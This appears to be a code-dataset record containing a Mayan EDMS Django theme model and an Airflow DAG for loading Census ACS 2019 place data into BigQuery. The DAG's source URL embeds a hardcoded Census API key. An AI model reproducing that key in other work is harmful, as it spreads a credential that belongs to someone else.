46accc39f3f252c43b8d9d2b19478ae7f13bd11d
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/appearance/models.py
|
ercusz/Mayan-EDMS
|
46accc39f3f252c43b8d9d2b19478ae7f13bd11d
|
[
"Apache-2.0"
] | null | null | null |
import bleach
import logging
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from mayan.apps.converter.models import Asset
from mayan.apps.databases.model_mixins import ExtraDataModelMixin
from mayan.apps.events.classes import EventManagerSave
from mayan.apps.events.decorators import method_event
from django.dispatch import receiver
from django.db.models.signals import post_save
from mayan.apps.acls.models import AccessControlList
from mayan.apps.permissions.models import Role, StoredPermission
from django.contrib.contenttypes.models import ContentType
from django.core.validators import MaxValueValidator, MinValueValidator
from .events import event_theme_created, event_theme_edited
logger = logging.getLogger(name=__name__)
class Theme(ExtraDataModelMixin, models.Model):
label = models.CharField(
db_index=True, help_text=_('A short text describing the theme.'),
max_length=128, unique=True, verbose_name=_('Label')
)
stylesheet = models.TextField(
blank=True, help_text=_(
'The CSS stylesheet to change the appearance of the different '
'user interface elements.'
), verbose_name=_('Stylesheet (Advanced)')
)
default = models.BooleanField(
default=False,
help_text=_(
'Set this theme to default theme.'
), verbose_name=_('Default Theme')
)
header_text_brand = models.CharField(
max_length=26, blank=True,
help_text=_('The heading text on header components.'),
verbose_name=_('Heading Text')
)
header_text_brand_size = models.PositiveIntegerField(
default=19, validators=[MinValueValidator(12), MaxValueValidator(36)],
help_text=_('The font size of heading text on header components. \n only support size 12-36px'),
verbose_name=_('Heading Text Font Size')
)
logo_asset = models.OneToOneField(
on_delete=models.CASCADE, to=Asset, verbose_name=_('Logo file'),
blank=True, null=True, related_name='logo_asset'
)
font_asset = models.OneToOneField(
on_delete=models.CASCADE, to=Asset, verbose_name=_('Font file'),
blank=True, null=True, related_name='font_asset'
)
font_header_asset = models.OneToOneField(
on_delete=models.CASCADE, to=Asset, verbose_name=_('Header font file'),
blank=True, null=True, related_name='font_header_asset'
)
header_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color on header components.'),
verbose_name=_('[Header] Background Color')
)
header_text = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('The text color on header components.'),
verbose_name=_('[Header] Text Color')
)
body_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color on page body.'),
verbose_name=_('[Body] Background Color')
)
body_text = models.CharField(
max_length=7, blank=True, default='#0a5286',
help_text=_('The text color on page body.'),
verbose_name=_('[Body] Text Color')
)
body_link_hover = models.CharField(
max_length=7, blank=True, default='#0a5286',
help_text=_('(Hover action)The link color on page body.'),
verbose_name=_('[Body] Link Text Color (Hover action)')
)
body_block = models.CharField(
max_length=7, blank=True, default='#ECF0F1',
help_text=_('The block color on page body.'),
verbose_name=_('[Body] Block Background Color')
)
body_primary_btn = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('The background color of primary button on page body.'),
verbose_name=_('[Body] Primary Button Background Color')
)
lpanel_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color on left panel components.'),
verbose_name=_('[Left Panel] Background Color')
)
lpanel_collapse_btn_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('The background color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Background Color')
)
lpanel_collapse_btn_text = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('The text color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Text Color')
)
lpanel_collapse_btn_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Hover action)The background color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Background Color(Hover action)')
)
lpanel_collapse_btn_text_hover = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Hover action)The text color of collapse button on left panel.'),
verbose_name=_('[Left Panel] Collapse Button Text Color(Hover action)')
)
lpanel_collapsed_panel_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Active action)The background color of collapsed panel on left panel.'),
verbose_name=_('[Left Panel] Collapsed Panel Background Color(Active action)')
)
lpanel_collapsed_btn_text = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Active action)The text color of collapsed button on left panel.'),
verbose_name=_('[Left Panel] Collapsed Button Text Color(Active action)')
)
lpanel_collapsed_btn_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Active+Hover action)The background color of collapsed button on left panel.'),
verbose_name=_('[Left Panel] Collapsed Button Background Color(Active+Hover action)')
)
rnav_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Hover action)The background color of button on right navbar.'),
verbose_name=_('[Right Navbar] Button Background Color(Hover action)')
)
rnav_text_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Hover action)The text color of button on right navbar.'),
verbose_name=_('[Right Navbar] Button Text Color(Hover action)')
)
rnav_panelex_bg = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Expanded Action)The background color of panel on right navbar menu list.'),
verbose_name=_('[Right Navbar] Expanded Panel Background Color(Expanded action)')
)
rnav_panelex_text = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Expanded Action)The text color of panel on right navbar menu list.'),
verbose_name=_('[Right Navbar] Expanded Panel Text Color(Expanded action)')
)
rnav_ex_bg_hover = models.CharField(
max_length=7, blank=True, default='#0F75BD',
help_text=_('(Expanded+Hover Action)The background color of panel on right navbar menu list when hover.'),
verbose_name=_('[Right Navbar] Expanded Panel Background Color(Expanded+Hover action)')
)
rnav_ex_text_hover = models.CharField(
max_length=7, blank=True, default='#ffffff',
help_text=_('(Expanded+Hover Action)The text color of panel on right navbar menu list when hover.'),
verbose_name=_('[Right Navbar] Expanded Panel Text Color(Expanded+Hover action)')
)
class Meta:
ordering = ('label',)
verbose_name = _('Theme')
verbose_name_plural = _('Themes')
def __str__(self):
return force_text(s=self.label)
def get_absolute_url(self):
return reverse(
viewname='appearance:theme_edit', kwargs={
'theme_id': self.pk
}
)
@method_event(
event_manager_class=EventManagerSave,
created={
'event': event_theme_created,
'target': 'self',
},
edited={
'event': event_theme_edited,
'target': 'self',
}
)
def save(self, *args, **kwargs):
self.stylesheet = bleach.clean(
text=self.stylesheet, tags=('style',)
)
if self.default:
Theme.objects.all().update(default=False)
super().save(*args, **kwargs)
def delete(self, *args, **kwargs):
try:
Asset.objects.get(label=self.label+'_logo').delete()
Asset.objects.get(label=self.label+'_font').delete()
Asset.objects.get(label=self.label+'_header_font').delete()
except:
logger.debug(
'Asset logo and font label="%s" not found', self.label
)
return super().delete(*args, **kwargs)
@receiver(post_save, sender=Theme)
def set_asset_permissions(sender, instance, created, **kwargs):
try:
logo_acl = AccessControlList.objects.create(
content_type=ContentType.objects
.get(app_label='converter', model='asset'),
content_object=Asset.objects.get(label=instance.label+'_logo'),
role=Role.objects.get(label='Users')
)
font_acl = AccessControlList.objects.create(
content_type=ContentType.objects
.get(app_label='converter', model='asset'),
content_object=Asset.objects.get(label=instance.label+'_font'),
role=Role.objects.get(label='Users')
)
font_header_acl = AccessControlList.objects.create(
content_type=ContentType.objects
.get(app_label='converter', model='asset'),
content_object=Asset.objects.get(label=instance.label+'_header_font'),
role=Role.objects.get(label='Users')
)
stored_permission = StoredPermission.objects.get(
namespace='converter',
name='asset_view',
)
logo_acl.permissions.add(stored_permission)
font_acl.permissions.add(stored_permission)
font_header_acl.permissions.add(stored_permission)
except:
logger.debug(
'ACLs for assets in theme="%s" was created', instance.label
)
class UserThemeSetting(models.Model):
user = models.OneToOneField(
on_delete=models.CASCADE, related_name='theme_settings',
to=settings.AUTH_USER_MODEL, verbose_name=_('User')
)
theme = models.ForeignKey(
blank=True, null=True, on_delete=models.CASCADE,
related_name='user_setting', to=Theme, verbose_name=_('Theme')
)
class Meta:
verbose_name = _('User theme setting')
verbose_name_plural = _('User theme settings')
def __str__(self):
return force_text(s=self.user)
| 41.962547
| 114
| 0.661549
|
4a0eb27033f6b9c491bccd17821f9215e6e87539
| 32,771
|
py
|
Python
|
datasets/census_bureau_acs/pipelines/place_2019_5yr/place_2019_5yr_dag.py
|
gkodukula/public-datasets-pipelines
|
4f4c87edae252059062ba479b80559e7675a885f
|
[
"Apache-2.0"
] | null | null | null |
datasets/census_bureau_acs/pipelines/place_2019_5yr/place_2019_5yr_dag.py
|
gkodukula/public-datasets-pipelines
|
4f4c87edae252059062ba479b80559e7675a885f
|
[
"Apache-2.0"
] | null | null | null |
datasets/census_bureau_acs/pipelines/place_2019_5yr/place_2019_5yr_dag.py
|
gkodukula/public-datasets-pipelines
|
4f4c87edae252059062ba479b80559e7675a885f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.providers.cncf.kubernetes.operators import kubernetes_pod
from airflow.providers.google.cloud.transfers import gcs_to_bigquery
default_args = {
"owner": "Google",
"depends_on_past": False,
"start_date": "2021-03-01",
}
with DAG(
dag_id="census_bureau_acs.place_2019_5yr",
default_args=default_args,
max_active_runs=1,
schedule_interval="@once",
catchup=False,
default_view="graph",
) as dag:
# Run CSV transform within kubernetes pod
place_2019_5yr_transform_csv = kubernetes_pod.KubernetesPodOperator(
task_id="place_2019_5yr_transform_csv",
startup_timeout_seconds=600,
name="place_2019_5yr",
namespace="composer",
service_account_name="datasets",
image_pull_policy="Always",
image="{{ var.json.census_bureau_acs.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "https://api.census.gov/data/2019/acs/acs~year_report~?get=NAME,~group_id~_~row_position~E&for=~api_naming_convention~:*&key=550e53635053be51754b09b5e9f5009c94aa0586",
"YEAR_REPORT": "5",
"API_NAMING_CONVENTION": "place",
"TARGET_FILE": "files/data_output.csv",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "data/census_bureau_acs/place_2019_5yr/data_output.csv",
"PIPELINE_NAME": "place_2019_5yr",
"GEOGRAPHY": "place",
"REPORT_LEVEL": "national_level",
"CONCAT_COL": '["state","place"]',
"RENAME_MAPPINGS": '{"0":"name", "1":"KPI_Value", "2":"state", "3":"place"}',
"CSV_HEADERS": '["geo_id","aggregate_travel_time_to_work","amerindian_including_hispanic","amerindian_pop","armed_forces","asian_including_hispanic","asian_male_45_54","asian_male_55_64","asian_pop","associates_degree","bachelors_degree","bachelors_degree_2","bachelors_degree_or_higher_25_64","black_including_hispanic","black_male_45_54","black_male_55_64","black_pop","children","children_in_single_female_hh","civilian_labor_force","commute_10_14_mins","commute_15_19_mins","commute_20_24_mins","commute_25_29_mins","commute_30_34_mins","commute_35_39_mins","commute_35_44_mins","commute_40_44_mins","commute_45_59_mins","commute_5_9_mins","commute_60_89_mins","commute_60_more_mins","commute_90_more_mins","commute_less_10_mins","commuters_16_over","commuters_by_bus","commuters_by_car_truck_van","commuters_by_carpool","commuters_by_public_transportation","commuters_by_subway_or_elevated","commuters_drove_alone","different_house_year_ago_different_city","different_house_year_ago_same_city","dwellings_10_to_19_units","dwellings_1_units_attached","dwellings_1_units_detached","dwellings_20_to_49_units","dwellings_2_units","dwellings_3_to_4_units","dwellings_50_or_more_units","dwellings_5_to_9_units","employed_agriculture_forestry_fishing_hunting_mining","employed_arts_entertainment_recreation_accommodation_food","employed_construction","employed_education_health_social","employed_finance_insurance_real_estate","employed_information","employed_manufacturing","employed_other_services_not_public_admin","employed_pop","employed_public_administration","employed_retail_trade","employed_science_management_admin_waste","employed_transportation_warehousing_utilities","employed_wholesale_trade","families_with_young_children","family_households","father_in_labor_force_one_parent_families_with_young_children","father_one_parent_families_with_young_children","female_10_to_14","female_15_to_17","female_18_to_19","female_20","female_21","female_22_to_24","female_25_to_29","female_30_to_34"
,"female_35_to_39","female_40_to_44","female_45_to_49","female_50_to_54","female_55_to_59","female_5_to_9","female_60_to_61","female_62_to_64","female_65_to_66","female_67_to_69","female_70_to_74","female_75_to_79","female_80_to_84","female_85_and_over","female_female_households","female_pop","female_under_5","four_more_cars","gini_index","graduate_professional_degree","group_quarters","high_school_diploma","high_school_including_ged","hispanic_any_race","hispanic_male_45_54","hispanic_male_55_64","hispanic_pop","households","households_public_asst_or_food_stamps","households_retirement_income","housing_built_1939_or_earlier","housing_built_2000_to_2004","housing_built_2005_or_later","housing_units","housing_units_renter_occupied","in_grades_1_to_4","in_grades_5_to_8","in_grades_9_to_12","in_school","in_undergrad_college","income_100000_124999","income_10000_14999","income_125000_149999","income_150000_199999","income_15000_19999","income_200000_or_more","income_20000_24999","income_25000_29999","income_30000_34999","income_35000_39999","income_40000_44999","income_45000_49999","income_50000_59999","income_60000_74999","income_75000_99999","income_less_10000","income_per_capita","less_one_year_college","less_than_high_school_graduate","male_10_to_14","male_15_to_17","male_18_to_19","male_20","male_21","male_22_to_24","male_25_to_29","male_30_to_34","male_35_to_39","male_40_to_44","male_45_64_associates_degree","male_45_64_bachelors_degree","male_45_64_grade_9_12","male_45_64_graduate_degree","male_45_64_high_school","male_45_64_less_than_9_grade","male_45_64_some_college","male_45_to_49","male_45_to_64","male_50_to_54","male_55_to_59","male_5_to_9","male_60_to_61","male_62_to_64","male_65_to_66","male_67_to_69","male_70_to_74","male_75_to_79","male_80_to_84","male_85_and_over","male_male_households","male_pop","male_under_5","management_business_sci_arts_employed","married_households","masters_degree","median_age","median_income","median_rent","median_year_structure
_built","million_dollar_housing_units","mobile_homes","mortgaged_housing_units","no_car","no_cars","nonfamily_households","not_hispanic_pop","not_in_labor_force","not_us_citizen_pop","occupation_management_arts","occupation_natural_resources_construction_maintenance","occupation_production_transportation_material","occupation_sales_office","occupation_services","occupied_housing_units","one_car","one_parent_families_with_young_children","one_year_more_college","other_race_pop","owner_occupied_housing_units","owner_occupied_housing_units_lower_value_quartile","owner_occupied_housing_units_median_value","owner_occupied_housing_units_upper_value_quartile","percent_income_spent_on_rent","pop_16_over","pop_25_64","pop_25_years_over","pop_5_years_over","pop_determined_poverty_status","pop_in_labor_force","population_1_year_and_over","population_3_years_over","poverty","rent_10_to_15_percent","rent_15_to_20_percent","rent_20_to_25_percent","rent_25_to_30_percent","rent_30_to_35_percent","rent_35_to_40_percent","rent_40_to_50_percent","rent_burden_not_computed","rent_over_50_percent","rent_under_10_percent","renter_occupied_housing_units_paying_cash_median_gross_rent","sales_office_employed","some_college_and_associates_degree","speak_only_english_at_home","speak_spanish_at_home","speak_spanish_at_home_low_english","three_cars","total_pop","two_cars","two_or_more_races_pop","two_parent_families_with_young_children","two_parents_father_in_labor_force_families_with_young_children","two_parents_in_labor_force_families_with_young_children","two_parents_mother_in_labor_force_families_with_young_children","two_parents_not_in_labor_force_families_with_young_children","unemployed_pop","vacant_housing_units","vacant_housing_units_for_rent","vacant_housing_units_for_sale","walked_to_work","white_including_hispanic","white_male_45_54","white_male_55_64","white_pop","worked_at_home","workers_16_and_over"]',
},
resources={
"request_memory": "4G",
"request_cpu": "2",
"request_ephemeral_storage": "10G",
},
)
# Task to load CSV data to a BigQuery table
load_place_2019_5yr_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_place_2019_5yr_to_bq",
bucket="{{ var.value.composer_bucket }}",
source_objects=["data/census_bureau_acs/place_2019_5yr/data_output.csv"],
source_format="CSV",
destination_project_dataset_table="census_bureau_acs.place_2019_5yr",
skip_leading_rows=1,
allow_quoted_newlines=True,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{"name": "geo_id", "type": "string", "mode": "nullable"},
{
"name": "aggregate_travel_time_to_work",
"type": "float",
"mode": "nullable",
},
{
"name": "amerindian_including_hispanic",
"type": "float",
"mode": "nullable",
},
{"name": "amerindian_pop", "type": "float", "mode": "nullable"},
{"name": "armed_forces", "type": "float", "mode": "nullable"},
{"name": "asian_including_hispanic", "type": "float", "mode": "nullable"},
{"name": "asian_male_45_54", "type": "float", "mode": "nullable"},
{"name": "asian_male_55_64", "type": "float", "mode": "nullable"},
{"name": "asian_pop", "type": "float", "mode": "nullable"},
{"name": "associates_degree", "type": "float", "mode": "nullable"},
{"name": "bachelors_degree", "type": "float", "mode": "nullable"},
{"name": "bachelors_degree_2", "type": "float", "mode": "nullable"},
{
"name": "bachelors_degree_or_higher_25_64",
"type": "float",
"mode": "nullable",
},
{"name": "black_including_hispanic", "type": "float", "mode": "nullable"},
{"name": "black_male_45_54", "type": "float", "mode": "nullable"},
{"name": "black_male_55_64", "type": "float", "mode": "nullable"},
{"name": "black_pop", "type": "float", "mode": "nullable"},
{"name": "children", "type": "float", "mode": "nullable"},
{
"name": "children_in_single_female_hh",
"type": "float",
"mode": "nullable",
},
{"name": "civilian_labor_force", "type": "float", "mode": "nullable"},
{"name": "commute_10_14_mins", "type": "float", "mode": "nullable"},
{"name": "commute_15_19_mins", "type": "float", "mode": "nullable"},
{"name": "commute_20_24_mins", "type": "float", "mode": "nullable"},
{"name": "commute_25_29_mins", "type": "float", "mode": "nullable"},
{"name": "commute_30_34_mins", "type": "float", "mode": "nullable"},
{"name": "commute_35_39_mins", "type": "float", "mode": "nullable"},
{"name": "commute_35_44_mins", "type": "float", "mode": "nullable"},
{"name": "commute_40_44_mins", "type": "float", "mode": "nullable"},
{"name": "commute_45_59_mins", "type": "float", "mode": "nullable"},
{"name": "commute_5_9_mins", "type": "float", "mode": "nullable"},
{"name": "commute_60_89_mins", "type": "float", "mode": "nullable"},
{"name": "commute_60_more_mins", "type": "float", "mode": "nullable"},
{"name": "commute_90_more_mins", "type": "float", "mode": "nullable"},
{"name": "commute_less_10_mins", "type": "float", "mode": "nullable"},
{"name": "commuters_16_over", "type": "float", "mode": "nullable"},
{"name": "commuters_by_bus", "type": "float", "mode": "nullable"},
{"name": "commuters_by_car_truck_van", "type": "float", "mode": "nullable"},
{"name": "commuters_by_carpool", "type": "float", "mode": "nullable"},
{
"name": "commuters_by_public_transportation",
"type": "float",
"mode": "nullable",
},
{
"name": "commuters_by_subway_or_elevated",
"type": "float",
"mode": "nullable",
},
{"name": "commuters_drove_alone", "type": "float", "mode": "nullable"},
{
"name": "different_house_year_ago_different_city",
"type": "float",
"mode": "nullable",
},
{
"name": "different_house_year_ago_same_city",
"type": "float",
"mode": "nullable",
},
{"name": "dwellings_10_to_19_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_1_units_attached", "type": "float", "mode": "nullable"},
{"name": "dwellings_1_units_detached", "type": "float", "mode": "nullable"},
{"name": "dwellings_20_to_49_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_2_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_3_to_4_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_50_or_more_units", "type": "float", "mode": "nullable"},
{"name": "dwellings_5_to_9_units", "type": "float", "mode": "nullable"},
{
"name": "employed_agriculture_forestry_fishing_hunting_mining",
"type": "float",
"mode": "nullable",
},
{
"name": "employed_arts_entertainment_recreation_accommodation_food",
"type": "float",
"mode": "nullable",
},
{"name": "employed_construction", "type": "float", "mode": "nullable"},
{
"name": "employed_education_health_social",
"type": "float",
"mode": "nullable",
},
{
"name": "employed_finance_insurance_real_estate",
"type": "float",
"mode": "nullable",
},
{"name": "employed_information", "type": "float", "mode": "nullable"},
{"name": "employed_manufacturing", "type": "float", "mode": "nullable"},
{
"name": "employed_other_services_not_public_admin",
"type": "float",
"mode": "nullable",
},
{"name": "employed_pop", "type": "float", "mode": "nullable"},
{
"name": "employed_public_administration",
"type": "float",
"mode": "nullable",
},
{"name": "employed_retail_trade", "type": "float", "mode": "nullable"},
{
"name": "employed_science_management_admin_waste",
"type": "float",
"mode": "nullable",
},
{
"name": "employed_transportation_warehousing_utilities",
"type": "float",
"mode": "nullable",
},
{"name": "employed_wholesale_trade", "type": "float", "mode": "nullable"},
{
"name": "families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "family_households", "type": "float", "mode": "nullable"},
{
"name": "father_in_labor_force_one_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "father_one_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "female_10_to_14", "type": "float", "mode": "nullable"},
{"name": "female_15_to_17", "type": "float", "mode": "nullable"},
{"name": "female_18_to_19", "type": "float", "mode": "nullable"},
{"name": "female_20", "type": "float", "mode": "nullable"},
{"name": "female_21", "type": "float", "mode": "nullable"},
{"name": "female_22_to_24", "type": "float", "mode": "nullable"},
{"name": "female_25_to_29", "type": "float", "mode": "nullable"},
{"name": "female_30_to_34", "type": "float", "mode": "nullable"},
{"name": "female_35_to_39", "type": "float", "mode": "nullable"},
{"name": "female_40_to_44", "type": "float", "mode": "nullable"},
{"name": "female_45_to_49", "type": "float", "mode": "nullable"},
{"name": "female_50_to_54", "type": "float", "mode": "nullable"},
{"name": "female_55_to_59", "type": "float", "mode": "nullable"},
{"name": "female_5_to_9", "type": "float", "mode": "nullable"},
{"name": "female_60_to_61", "type": "float", "mode": "nullable"},
{"name": "female_62_to_64", "type": "float", "mode": "nullable"},
{"name": "female_65_to_66", "type": "float", "mode": "nullable"},
{"name": "female_67_to_69", "type": "float", "mode": "nullable"},
{"name": "female_70_to_74", "type": "float", "mode": "nullable"},
{"name": "female_75_to_79", "type": "float", "mode": "nullable"},
{"name": "female_80_to_84", "type": "float", "mode": "nullable"},
{"name": "female_85_and_over", "type": "float", "mode": "nullable"},
{"name": "female_female_households", "type": "float", "mode": "nullable"},
{"name": "female_pop", "type": "float", "mode": "nullable"},
{"name": "female_under_5", "type": "float", "mode": "nullable"},
{"name": "four_more_cars", "type": "float", "mode": "nullable"},
{"name": "gini_index", "type": "float", "mode": "nullable"},
{
"name": "graduate_professional_degree",
"type": "float",
"mode": "nullable",
},
{"name": "group_quarters", "type": "float", "mode": "nullable"},
{"name": "high_school_diploma", "type": "float", "mode": "nullable"},
{"name": "high_school_including_ged", "type": "float", "mode": "nullable"},
{"name": "hispanic_any_race", "type": "float", "mode": "nullable"},
{"name": "hispanic_male_45_54", "type": "float", "mode": "nullable"},
{"name": "hispanic_male_55_64", "type": "float", "mode": "nullable"},
{"name": "hispanic_pop", "type": "float", "mode": "nullable"},
{"name": "households", "type": "float", "mode": "nullable"},
{
"name": "households_public_asst_or_food_stamps",
"type": "float",
"mode": "nullable",
},
{
"name": "households_retirement_income",
"type": "float",
"mode": "nullable",
},
{
"name": "housing_built_1939_or_earlier",
"type": "float",
"mode": "nullable",
},
{"name": "housing_built_2000_to_2004", "type": "float", "mode": "nullable"},
{
"name": "housing_built_2005_or_later",
"type": "float",
"mode": "nullable",
},
{"name": "housing_units", "type": "float", "mode": "nullable"},
{
"name": "housing_units_renter_occupied",
"type": "float",
"mode": "nullable",
},
{"name": "in_grades_1_to_4", "type": "float", "mode": "nullable"},
{"name": "in_grades_5_to_8", "type": "float", "mode": "nullable"},
{"name": "in_grades_9_to_12", "type": "float", "mode": "nullable"},
{"name": "in_school", "type": "float", "mode": "nullable"},
{"name": "in_undergrad_college", "type": "float", "mode": "nullable"},
{"name": "income_100000_124999", "type": "float", "mode": "nullable"},
{"name": "income_10000_14999", "type": "float", "mode": "nullable"},
{"name": "income_125000_149999", "type": "float", "mode": "nullable"},
{"name": "income_150000_199999", "type": "float", "mode": "nullable"},
{"name": "income_15000_19999", "type": "float", "mode": "nullable"},
{"name": "income_200000_or_more", "type": "float", "mode": "nullable"},
{"name": "income_20000_24999", "type": "float", "mode": "nullable"},
{"name": "income_25000_29999", "type": "float", "mode": "nullable"},
{"name": "income_30000_34999", "type": "float", "mode": "nullable"},
{"name": "income_35000_39999", "type": "float", "mode": "nullable"},
{"name": "income_40000_44999", "type": "float", "mode": "nullable"},
{"name": "income_45000_49999", "type": "float", "mode": "nullable"},
{"name": "income_50000_59999", "type": "float", "mode": "nullable"},
{"name": "income_60000_74999", "type": "float", "mode": "nullable"},
{"name": "income_75000_99999", "type": "float", "mode": "nullable"},
{"name": "income_less_10000", "type": "float", "mode": "nullable"},
{"name": "income_per_capita", "type": "float", "mode": "nullable"},
{"name": "less_one_year_college", "type": "float", "mode": "nullable"},
{
"name": "less_than_high_school_graduate",
"type": "float",
"mode": "nullable",
},
{"name": "male_10_to_14", "type": "float", "mode": "nullable"},
{"name": "male_15_to_17", "type": "float", "mode": "nullable"},
{"name": "male_18_to_19", "type": "float", "mode": "nullable"},
{"name": "male_20", "type": "float", "mode": "nullable"},
{"name": "male_21", "type": "float", "mode": "nullable"},
{"name": "male_22_to_24", "type": "float", "mode": "nullable"},
{"name": "male_25_to_29", "type": "float", "mode": "nullable"},
{"name": "male_30_to_34", "type": "float", "mode": "nullable"},
{"name": "male_35_to_39", "type": "float", "mode": "nullable"},
{"name": "male_40_to_44", "type": "float", "mode": "nullable"},
{
"name": "male_45_64_associates_degree",
"type": "float",
"mode": "nullable",
},
{
"name": "male_45_64_bachelors_degree",
"type": "float",
"mode": "nullable",
},
{"name": "male_45_64_grade_9_12", "type": "float", "mode": "nullable"},
{"name": "male_45_64_graduate_degree", "type": "float", "mode": "nullable"},
{"name": "male_45_64_high_school", "type": "float", "mode": "nullable"},
{
"name": "male_45_64_less_than_9_grade",
"type": "float",
"mode": "nullable",
},
{"name": "male_45_64_some_college", "type": "float", "mode": "nullable"},
{"name": "male_45_to_49", "type": "float", "mode": "nullable"},
{"name": "male_45_to_64", "type": "float", "mode": "nullable"},
{"name": "male_50_to_54", "type": "float", "mode": "nullable"},
{"name": "male_55_to_59", "type": "float", "mode": "nullable"},
{"name": "male_5_to_9", "type": "float", "mode": "nullable"},
{"name": "male_60_to_61", "type": "float", "mode": "nullable"},
{"name": "male_62_to_64", "type": "float", "mode": "nullable"},
{"name": "male_65_to_66", "type": "float", "mode": "nullable"},
{"name": "male_67_to_69", "type": "float", "mode": "nullable"},
{"name": "male_70_to_74", "type": "float", "mode": "nullable"},
{"name": "male_75_to_79", "type": "float", "mode": "nullable"},
{"name": "male_80_to_84", "type": "float", "mode": "nullable"},
{"name": "male_85_and_over", "type": "float", "mode": "nullable"},
{"name": "male_male_households", "type": "float", "mode": "nullable"},
{"name": "male_pop", "type": "float", "mode": "nullable"},
{"name": "male_under_5", "type": "float", "mode": "nullable"},
{
"name": "management_business_sci_arts_employed",
"type": "float",
"mode": "nullable",
},
{"name": "married_households", "type": "float", "mode": "nullable"},
{"name": "masters_degree", "type": "float", "mode": "nullable"},
{"name": "median_age", "type": "float", "mode": "nullable"},
{"name": "median_income", "type": "float", "mode": "nullable"},
{"name": "median_rent", "type": "float", "mode": "nullable"},
{
"name": "median_year_structure_built",
"type": "float",
"mode": "nullable",
},
{
"name": "million_dollar_housing_units",
"type": "float",
"mode": "nullable",
},
{"name": "mobile_homes", "type": "float", "mode": "nullable"},
{"name": "mortgaged_housing_units", "type": "float", "mode": "nullable"},
{"name": "no_car", "type": "float", "mode": "nullable"},
{"name": "no_cars", "type": "float", "mode": "nullable"},
{"name": "nonfamily_households", "type": "float", "mode": "nullable"},
{"name": "not_hispanic_pop", "type": "float", "mode": "nullable"},
{"name": "not_in_labor_force", "type": "float", "mode": "nullable"},
{"name": "not_us_citizen_pop", "type": "float", "mode": "nullable"},
{"name": "occupation_management_arts", "type": "float", "mode": "nullable"},
{
"name": "occupation_natural_resources_construction_maintenance",
"type": "float",
"mode": "nullable",
},
{
"name": "occupation_production_transportation_material",
"type": "float",
"mode": "nullable",
},
{"name": "occupation_sales_office", "type": "float", "mode": "nullable"},
{"name": "occupation_services", "type": "float", "mode": "nullable"},
{"name": "occupied_housing_units", "type": "float", "mode": "nullable"},
{"name": "one_car", "type": "float", "mode": "nullable"},
{
"name": "one_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "one_year_more_college", "type": "float", "mode": "nullable"},
{"name": "other_race_pop", "type": "float", "mode": "nullable"},
{
"name": "owner_occupied_housing_units",
"type": "float",
"mode": "nullable",
},
{
"name": "owner_occupied_housing_units_lower_value_quartile",
"type": "float",
"mode": "nullable",
},
{
"name": "owner_occupied_housing_units_median_value",
"type": "float",
"mode": "nullable",
},
{
"name": "owner_occupied_housing_units_upper_value_quartile",
"type": "float",
"mode": "nullable",
},
{
"name": "percent_income_spent_on_rent",
"type": "float",
"mode": "nullable",
},
{"name": "pop_16_over", "type": "float", "mode": "nullable"},
{"name": "pop_25_64", "type": "float", "mode": "nullable"},
{"name": "pop_25_years_over", "type": "float", "mode": "nullable"},
{"name": "pop_5_years_over", "type": "float", "mode": "nullable"},
{
"name": "pop_determined_poverty_status",
"type": "float",
"mode": "nullable",
},
{"name": "pop_in_labor_force", "type": "float", "mode": "nullable"},
{"name": "population_1_year_and_over", "type": "float", "mode": "nullable"},
{"name": "population_3_years_over", "type": "float", "mode": "nullable"},
{"name": "poverty", "type": "float", "mode": "nullable"},
{"name": "rent_10_to_15_percent", "type": "float", "mode": "nullable"},
{"name": "rent_15_to_20_percent", "type": "float", "mode": "nullable"},
{"name": "rent_20_to_25_percent", "type": "float", "mode": "nullable"},
{"name": "rent_25_to_30_percent", "type": "float", "mode": "nullable"},
{"name": "rent_30_to_35_percent", "type": "float", "mode": "nullable"},
{"name": "rent_35_to_40_percent", "type": "float", "mode": "nullable"},
{"name": "rent_40_to_50_percent", "type": "float", "mode": "nullable"},
